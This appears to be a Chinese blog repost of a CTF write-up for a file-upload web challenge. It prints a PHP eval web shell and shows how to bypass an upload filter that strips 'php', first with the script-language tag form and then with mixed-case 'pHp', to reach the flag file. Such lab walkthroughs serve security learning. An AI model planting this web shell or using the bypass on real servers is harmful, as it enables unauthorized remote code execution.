0
点赞
收藏
分享

微信扫一扫

“百度杯”CTF比赛 九月场——Web-Upload

jjt二向箔 2023-05-20 阅读 55


=============================

个人收获:

1.PHP标记的不同写法

2.PHP标记被过滤可以试试大小写

==============================

 

 

不知道为什么写这篇文章的时候CSDN的服务器出现问题一直无法上传图片,索性就不传了,因为这题挺简单的。

 

题目开始是说让我们随便上传文件,那么我们找个一句话直接上传

<?php 
 @eval($_POST["code"]);
 ?>

然后会出现上传成功!

我点下那个文字就能调转到我们上传的文件地址

 

显示如下内容

eval($_POST['a']); ?>

发下<php被过滤了,那我们采用别的php标记写法

<script language="php"> 

 @eval($_POST["code"]);

</script>

然后再次上传出现菜刀这个提示

 

HTTP /1.1 200ok
Server: nginx/1.10.2
......(此处省去其他头部信息)

<script language=""> 

 @eval($_POST["code"]);

</script>

 

我们发下php被过滤掉了那我们试试大小写

<script language="pHp"> 

 @eval($_POST["code"]);

</script>

然后能就能成功解析 找到

然后flag 就在/var/www/html/flag.php

举报

相关推荐

0 条评论